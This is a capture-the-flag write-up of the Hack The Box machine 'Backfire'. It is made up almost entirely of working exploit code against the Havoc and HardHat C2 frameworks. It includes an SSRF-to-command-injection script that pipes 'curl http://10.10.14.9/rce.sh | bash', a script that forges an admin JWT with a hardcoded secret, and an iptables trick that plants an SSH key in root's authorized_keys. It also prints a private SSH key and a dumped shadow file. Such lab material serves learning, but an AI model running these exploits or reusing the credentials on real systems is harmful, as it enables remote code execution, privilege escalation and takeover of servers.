nmap -A -v -T4 10.10.11.49
https://github.com/chebuya/Havoc-C2-SSRF-poc
https://github.com/syncwithali/HavocExploit
https://github.com/IncludeSecurity/c2-vulnerabilities.git
import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
from Crypto.Cipher import AES
from Crypto.Util import Counter
urllib3.disable_warnings()
key_bytes = 32
def decrypt(key, iv, ciphertext):
if len(key) <= key_bytes:
for _ in range(len(key), key_bytes):
key += b"0"
assert len(key) == key_bytes
iv_int = int(binascii.hexlify(iv), 16)
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
aes = AES.new(key, AES.MODE_CTR, counter=ctr)
plaintext = aes.decrypt(ciphertext)
return plaintext
def int_to_bytes(value, length=4, byteorder="big"):
return value.to_bytes(length, byteorder)
def encrypt(key, iv, plaintext):
if len(key) <= key_bytes:
for x in range(len(key), key_bytes):
key = key + b"0"
assert len(key) == key_bytes
iv_int = int(binascii.hexlify(iv), 16)
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
aes = AES.new(key, AES.MODE_CTR, counter=ctr)
ciphertext = aes.encrypt(plaintext)
return ciphertext
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
command = b"x00x00x00x63"
request_id = b"x00x00x00x01"
demon_id = agent_id
hostname_length = int_to_bytes(len(hostname))
username_length = int_to_bytes(len(username))
domain_name_length = int_to_bytes(len(domain_name))
internal_ip_length = int_to_bytes(len(internal_ip))
process_name_length = int_to_bytes(len(process_name) - 6)
data = b"xab" * 100
header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
print(agent_header + header_data)
print("[+] Trying to register agent...")
r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] Success!")
else:
print(f"[-] Failed to register agent - {r.status_code} {r.text}")
def open_socket(socket_id, target_address, target_port):
command = b"x00x00x09xec"
request_id = b"x00x00x00x02"
subcommand = b"x00x00x00x10"
sub_request_id = b"x00x00x00x03"
local_addr = b"x22x22x22x22"
local_port = b"x33x33x33x33"
forward_addr = b""
for octet in target_address.split(".")[::-1]:
forward_addr += int_to_bytes(int(octet), length=1)
forward_port = int_to_bytes(target_port)
package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port
package_size = int_to_bytes(len(package) + 4)
header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print("[+] Trying to open socket on the teamserver...")
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] Success!")
else:
print(f"[-] Failed to open socket on teamserver - {r.status_code} {r.text}")
def write_socket(socket_id, data):
command = b"x00x00x09xec"
request_id = b"x00x00x00x08"
subcommand = b"x00x00x00x11"
sub_request_id = b"x00x00x00xa1"
socket_type = b"x00x00x00x03"
success = b"x00x00x00x01"
data_length = int_to_bytes(len(data))
package = subcommand + socket_id + socket_type + success + data_length + data
package_size = int_to_bytes(len(package) + 4)
header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
post_data = agent_header + header_data
print(post_data)
print("[+] Trying to write to the socket")
r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] Success!")
else:
print(f"[-] Failed to write data to the socket - {r.status_code} {r.text}")
def read_socket(socket_id):
command = b"x00x00x00x01"
request_id = b"x00x00x00x09"
header_data = command + request_id
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print("[+] Trying to poll teamserver for socket output...")
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] Read socket output successfully!")
else:
print(f"[-] Failed to read socket output - {r.status_code} {r.text}")
return ""
command_id = int.from_bytes(r.content[0:4], "little")
request_id = int.from_bytes(r.content[4:8], "little")
package_size = int.from_bytes(r.content[8:12], "little")
enc_package = r.content[12:]
return decrypt(AES_Key, AES_IV, enc_package)[12:]
def create_websocket_request(host, port):
request = (
f"GET /havoc/ HTTP/1.1rn"
f"Host: {host}:{port}rn"
f"Upgrade: websocketrn"
f"Connection: Upgradern"
f"Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg==rn"
f"Sec-WebSocket-Version: 13rn"
f"rn"
).encode()
return request
def build_websocket_frame(payload):
payload_bytes = payload.encode("utf-8")
frame = bytearray()
frame.append(0x81)
payload_length = len(payload_bytes)
if payload_length <= 125:
frame.append(0x80 | payload_length)
elif payload_length <= 65535:
frame.append(0x80 | 126)
frame.extend(payload_length.to_bytes(2, byteorder="big"))
else:
frame.append(0x80 | 127)
frame.extend(payload_length.to_bytes(8, byteorder="big"))
masking_key = os.urandom(4)
frame.extend(masking_key)
masked_payload = bytearray(byte ^ masking_key[i % 4] for i, byte in enumerate(payload_bytes))
frame.extend(masked_payload)
return frame
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")
args = parser.parse_args()
magic = b"xdexadxbexef"
teamserver_listener_url = args.target
headers = {
"User-Agent": args.user_agent
}
agent_id = int_to_bytes(random.randint(100000, 1000000))
AES_Key = b"x00" * 32
AES_IV = b"x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))
register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)
socket_id = b"x11x11x11x11"
open_socket(socket_id, args.ip, int(args.port))
USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"
host = "127.0.0.1"
port = 40056
websocket_request = create_websocket_request(host, port)
write_socket(socket_id, websocket_request)
response = read_socket(socket_id)
payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)
payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)
cmd = "curl http://10.10.14.9/rce.sh | bash"
injection = """ \\\" -mbla; """ + cmd + """ 1>&2 && false #"""
payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{n "Amsi/Etw Patch": "None",n "Indirect Syscall": false,n "Injection": {n "Alloc": "Native/Syscall",n "Execute": "Native/Syscall",n "Spawn32": "C:\\Windows\\SysWOW64\\notepad.exe",n "Spawn64": "C:\\Windows\\System32\\notepad.exe"n },n "Jitter": "0",n "Proxy Loading": "None (LdrLoadDll)",n "Service Name":"" + injection + "",n "Sleep": "2",n "Sleep Jmp Gadget": "None",n "Sleep Technique": "WaitForSingleObjectEx",n "Stack Duplication": falsen}n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": {
"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)
command:python3 havoc_rce.py --target https://10.10.11.49/ -i 127.0.0.1 -p 40056
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEAsNha5ygSDBL7qEaKEWBdI381rALv08910Yys+czNZ87q/BXKLWCw
Xl9J0KryAfE41WJKQS8PYqoa2rCFQCghWOb7QXugz7TNIvjHAv0wiBx5w2/HjhihtFnvrq
W94RMOAwYfilnYQUhLM9bwead62kO9KdeKxF88C3UM+ULgr5EoWNStSJ+/LkMJGKEsZxxC
0XQkGhq35nkf12IUSMH4vYtWGnh5jZlNAOTQ4sRHWwXojLMznIjMbswsduKeJjIooCCMTH
6kHoHc/0S6v3QoMk5J+q+mljzQBR/ufFSYKkJX0KX3wf59pY301TdbEcLqsgHK/QaEopqX
84QqS3b/X+SYhhvGMtXM4xSvlWnmR/iUriByomOkkeYVmzN9UwAaUaHwbQrghDp/tXF51X
1YMKkJLuVnRbBYlNYMDNXFlYt36mFo/2wj3bgTlRlbXEoGsg6B1wxZvqerilSw84jG0h0k
R3mMmtYf3W6p8sABNB1O/w5B2mr/LE75g1M9ORFLaKL/lJkki4g3z8rYs98qA8wiucDiMu
TI1OrFPwAacLKp9zTnHqaDqi3VINVUx8cwK58b1PmdvxPSUSjXWFB6KFW6C5EvczjeHGtT
O3OAEEMbJ5eNNq9lrny365Ds1f4z3vzjxYYePPXcYIVvLtWHc/Kse1z86mxYUocLuorMXb
sAAAdIonR/r6J0f68AAAAHc3NoLXJzYQAAAgEAsNha5ygSDBL7qEaKEWBdI381rALv0891
0Yys+czNZ87q/BXKLWCwXl9J0KryAfE41WJKQS8PYqoa2rCFQCghWOb7QXugz7TNIvjHAv
0wiBx5w2/HjhihtFnvrqW94RMOAwYfilnYQUhLM9bwead62kO9KdeKxF88C3UM+ULgr5Eo
WNStSJ+/LkMJGKEsZxxC0XQkGhq35nkf12IUSMH4vYtWGnh5jZlNAOTQ4sRHWwXojLMznI
jMbswsduKeJjIooCCMTH6kHoHc/0S6v3QoMk5J+q+mljzQBR/ufFSYKkJX0KX3wf59pY30
1TdbEcLqsgHK/QaEopqX84QqS3b/X+SYhhvGMtXM4xSvlWnmR/iUriByomOkkeYVmzN9Uw
AaUaHwbQrghDp/tXF51X1YMKkJLuVnRbBYlNYMDNXFlYt36mFo/2wj3bgTlRlbXEoGsg6B
1wxZvqerilSw84jG0h0kR3mMmtYf3W6p8sABNB1O/w5B2mr/LE75g1M9ORFLaKL/lJkki4
g3z8rYs98qA8wiucDiMuTI1OrFPwAacLKp9zTnHqaDqi3VINVUx8cwK58b1PmdvxPSUSjX
WFB6KFW6C5EvczjeHGtTO3OAEEMbJ5eNNq9lrny365Ds1f4z3vzjxYYePPXcYIVvLtWHc/
Kse1z86mxYUocLuorMXbsAAAADAQABAAACACIDw1xR10LORexkgPr9o3yH481tlS6S6VEA
c2bqzxln8cfB8yzOO64zOtHxh3H7MVjNuoWWJSnvmRG2QTMJZPyiFPLP8irxVkGjQzgedf
7AJ2WBcwswTq4PXGwlwgNwNFI9k8R7Kn7IBnr2nTNxFM61l8VcCXti6/wyK+gnxmrOi0mm
wpvE6jNePnonyhAdHfcGlUkWGYgxhP/bBBbIhG0Ex294+7xSH78Lw+fSI/1sggHKGCPEJj
oreGP3i77CCBFgoUu3Uh7yEI1i7V6U24RtjYozzeF42fQaY7czWD9MmnJt8d0083rr9osq
RhCBAr5xXNdVMR7LiG2U3sO8JDs9oszGNRGOHPwu9oC1/Wts/KDX++3lgldeA4KFPxr1vN
Id/maG7a3X7lPDq9nEGusyjPLesq8fiefrHyp/YKufc5e/HJw20YbzcfdDOAeFz5HV4ChT
J/by73/M3bWCH0MDoO+Sc0Ah9Sl5GSL8sw6tFmZHV3YutZvJohy3IxYRCzkz80CspFsNKy
aCMuwKA6kNl58EDXF6BKFkDoICxwNBiJ1rEFOoc72aLlnPMCpCqg2tjb86eOluNbPgOcxK
a2fhu+jd8hQfXlhjs1usJVBvi2IalKCbCBkHFKgvYj0AlVSt1i70OQN+ltrbB3zGhwl9Ac
qyKDxUs2h1p/gkA+LtAAABAGizAhWLeGkUlI+xJ5YArBdLi1N35aH1iwwsLbWBlqYnVuxA
QxbA3sDRiycyYY1PX6vE+dCCTpF1VYj6uQzwDCmcHzO2lo30DJCXi+zKqD/pmHgGJ6sx5o
l077rLPMSHJTq1NwQXJOuZMNDmwh0o/wsRkGT0fgzfd5Mm+bMwrGnScRb4gWeOz14GXOiA
syRjSkSMfWQdjL431wCIR1tz5iwgUDCprsqumiqP9d3SJLbrj+LVTR2bkaytnCxSwtuXV9
2CXVVO8VvmR4NoBcYqm/ePP9sWImXLo2+rFJgBOJwsBYfnforWyxrxasiCIGBJHb/coKU2
PipwxLwFem9OHyAAAAEBAO95F5dkN7Va1buudM/srb+tKHNCtgIyT0siU0Ydppinrpu99x
fN9B5fShtNDl8EEGLrDA537JYK243nr+0Vdj3eKKtvswWybIrfKRKquEaLM5VSS+E5qtsN
w63QDCQRME2Cfn852NwjPMh9BqXONtul/VbLEIDZW1QAr7Zb+NazoaB/+4MR1nV/5RqEiT
84Y+UEtp9HYWu5Hnw7c3fZafFGV3nAhsM4jmbUW3eATKgk35atA+L9B0NUGBzAAxOT17Qv
F9czPlYv5Mot4jRvIdXGQKAdRDKUQux9XWpm5TGGrXZ+WeQXOx7jLsvEPOOu9UoBrrVaWW
Zaw55GHd617AcAAAEBAL0Mx7PBd3ZhadLsW7hNoYZubOsFdeQyycWm0YNE13OLyCRVr4Ht
3Bo202sPWhe5fYLjYotvyILcoEVt23ihw5t6zWeI52/7t8US+sqz3/+Pm1KmehKJLq4DJt
YLiL+lWhqH9We6sgewa8KgJsmQIIT4s0pFHQjEZWQCk+uEz+txw8wnTci6KGzqOkqYInET
5N2b+V6VB5syrPwHwfs9pPLDEK8P6gz/yGbp8b1xgg9j1eVKVjeI+BayeaFI4raa5y0Bkp
AewAfoJwlS7xASg4aHNB6g0OoLL8/Xdth1YZtzrzDwvd1EqOA3hb6I7Ajb786rRca9MPml
7GNv8b7H+60AAAAMcmlvZHJ3bkBrYWxpAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
import jwt
import datetime
import uuid
import requests
# Configuration
rhost = '127.0.0.1:5000' # Host for the API endpoint
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq" # Secret key for JWT signing
issuer = "hardhatc2.com" # Issuer of the JWT
# Debug: Print configuration settings
print("[+] Configuration set:")
print(f" rhost: {rhost}")
print(f" secret: {secret[:5]}...") # Print part of the secret to avoid full exposure
print(f" issuer: {issuer}")
# Create JWT Token for Admin user
now = datetime.datetime.utcnow() # Get current UTC time
expiration = now + datetime.timedelta(days=28) # Set expiration date for 28 days from now
# Debug: Show time information
print("[+] Current UTC time:", now)
print("[+] Expiration time:", expiration)
# Define JWT Payload
payload = {
"sub": "HardHat_Admin", # Subject (the user that the token is for)
"jti": str(uuid.uuid4()), # Unique identifier for the token
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1", # Name identifier
"iss": issuer, # Issuer of the token
"aud": issuer, # Audience for the token
"iat": int(now.timestamp()), # Issued at time (in seconds since epoch)
"exp": int(expiration.timestamp()), # Expiration time (in seconds since epoch)
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator" # Role of the user
}
# Debug: Show payload before encoding
print("[+] JWT Payload:")
for key, value in payload.items():
print(f" {key}: {value}")
# Encode JWT with the secret and HS256 algorithm
token = jwt.encode(payload, secret, algorithm="HS256")
# Debug: Show generated JWT token (first 50 characters for brevity)
print("[+] Generated JWT (first 50 chars):")
print(token[:50])
# Use Admin JWT to create a new user 'pfapostol' as TeamLead
burp0_url = f"https://{rhost}/Login/Register" # URL for the user registration endpoint
# Debug: Show the URL for registration
print("[+] Sending request to URL:", burp0_url)
# Set headers for the request including the Authorization token
burp0_headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
# JSON data to register the new user
burp0_json = {
"password": "pfapostol", # Password for the new user
"role": "TeamLead", # Role to be assigned to the new user
"username": "pfapostol" # Username for the new user
}
# Debug: Show headers and payload for the request
print("[+] Headers and JSON payload:")
print(" Headers:", burp0_headers)
print(" JSON Payload:", burp0_json)
# Send the POST request to register the new user
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
# Debug: Show response status and content
print("[+] Response status code:", r.status_code)
print("[+] Response content:", r.text)
sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFafyRywbrdQjXxVMl1rKsXLVdY4xnkFTNAAkDGRPsiJ root@v-vn'
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
root:$y$j9T$YhphiLO.G4w3yAv438MQP/$3JhvSgFS6VV4F79Mi5VuQDkhg63yMgjbpy.krot/tn.:19996:0:99999:7:::
daemon:*:19993:0:99999:7:::
bin:*:19993:0:99999:7:::
sys:*:19993:0:99999:7:::
sync:*:19993:0:99999:7:::
games:*:19993:0:99999:7:::
man:*:19993:0:99999:7:::
lp:*:19993:0:99999:7:::
mail:*:19993:0:99999:7:::
news:*:19993:0:99999:7:::
uucp:*:19993:0:99999:7:::
proxy:*:19993:0:99999:7:::
www-data:*:19993:0:99999:7:::
backup:*:19993:0:99999:7:::
list:*:19993:0:99999:7:::
irc:*:19993:0:99999:7:::
_apt:*:19993:0:99999:7:::
nobody:*:19993:0:99999:7:::
systemd-network:!*:19993::::::
systemd-timesync:!*:19993::::::
messagebus:!:19993::::::
ilya:$y$j9T$QAKBQrxLvdJTOvPiSUD8Z.$970OYpnfl/koGTRGPbmxntWv/HzGp5Nrjr7Vwfv6NXA:19996:0:99999:7:::
sshd:!:19993::::::
sergej:$y$j9T$ToRPOlaRsEcSVPj7IrwIw/$7WM.jKKviRj8JoXWN2pjVqrxuunYDv/G4b0PHmsEFd2:19996:0:99999:7:::
_laurel:!:20069::::::
原文始发于微信公众号(Jiyou too beautiful):HTB-Backfire
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论